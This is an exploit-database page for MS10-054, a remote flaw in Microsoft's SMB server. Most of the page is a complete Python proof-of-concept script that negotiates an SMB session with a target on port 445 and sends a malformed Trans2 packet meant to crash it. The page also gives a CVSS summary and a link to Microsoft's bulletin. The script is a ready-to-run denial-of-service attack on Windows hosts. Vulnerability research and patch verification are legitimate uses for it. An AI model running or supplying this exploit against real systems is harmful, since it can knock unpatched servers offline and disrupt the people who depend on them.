Microsoft SMB Server Trans2 Zero Size Pool Alloc

2010.08.12
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

&#239;&#187;&#191;#!/usr/bin/env python import sys,struct,socket from socket import * if len(sys.argv)<=2: print '#######################################################################' print '# MS10-054 Proof Of Concept by Laurent Gaffie' print '# Usage: python '+sys.argv[0]+' TARGET SHARE-NAME (No backslash)' print '# Example: python '+sys.argv[0]+' 192.168.8.101 users' print '# http://g-laurent.blogspot.com/' print '# http://twitter.com/laurentgaffie' print '# Email: laurent.gaffie{at}gmail{dot}com' print '#######################################################################\n\n' sys.exit() host = str(sys.argv[1]),445 packetnego = "\x00\x00\x00\x9a" packetnego += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" packetnego += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00\x01\x3d" packetnego += "\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50" packetnego += "\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4d\x49\x43\x52" packetnego += "\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x33" packetnego += "\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d\x31\x2e\x32\x58\x30\x30" packetnego += "\x32\x00\x02\x44\x4f\x53\x20\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31" packetnego += "\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f" packetnego += "\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4e" packetnego += "\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00" def tidpiduidfield(data): all_=data[28:34] return all_ def handle(data): ##Chained SMB commands; Session Setup AndX Request,Tree connect if data[8:10] == "\x72\x00": sharename = "\x00\x00\x5c\x5c\x5c"+str(sys.argv[2])+"\x00\x3f\x3f\x3f\x3f\x3f\x00" packetsession = "\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00" packetsession += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd5\x15\x01\x00\x81\x2f" packetsession += "\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18" packetsession += "\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x01\x01\x01" packetsession += "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" packetsession += "\x01\x01\x01\x01\x01\x59\x4f\x00\x57\x4f\x52\x4b\x47\x52\x4f\x55" packetsession += "\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x57\x69" packetsession += "\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff\x00\x00\x00\x00" packetsession += "\x00\x01\x00"+struct.pack(">i", len(sharename))[3:4]+sharename print "[+]Session Query sent" return struct.pack(">i", len(packetsession))+packetsession ##Trans2, Request, QUERY_FS_INFO Query FS Attribute Info if data[8:10] == "\x73\x00": packetrans = "\x00\x00\x00\x46" packetrans += "\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x01\xc8\x00\x00\x00\x00" packetrans += "\x00\x00\x00\x00\x00\x00\x00\x00"+tidpiduidfield(data)+"\x13\x00" packetrans += "\x0f\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" packetrans += "\x00\x00\x00\x02\x00\x44\x00\x00\x00\x46\x00\x01\x00\x03\x00\x05" packetrans += "\x00\x00\x44\x20\x05\x01" print "[+]Malformed Trans2 packet sent\n[+]The target should be down now" return packetrans def run(): s = socket(AF_INET, SOCK_STREAM) s.connect(host) s.settimeout(2) s.send(packetnego) print "[+]Negotiate Protocol Request sent" try: while True: data = s.recv(1024) s.send(handle(data)) except Exception: pass s.close() run()

References:

http://www.microsoft.com/technet/security/Bulletin/MS10-054.mspx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top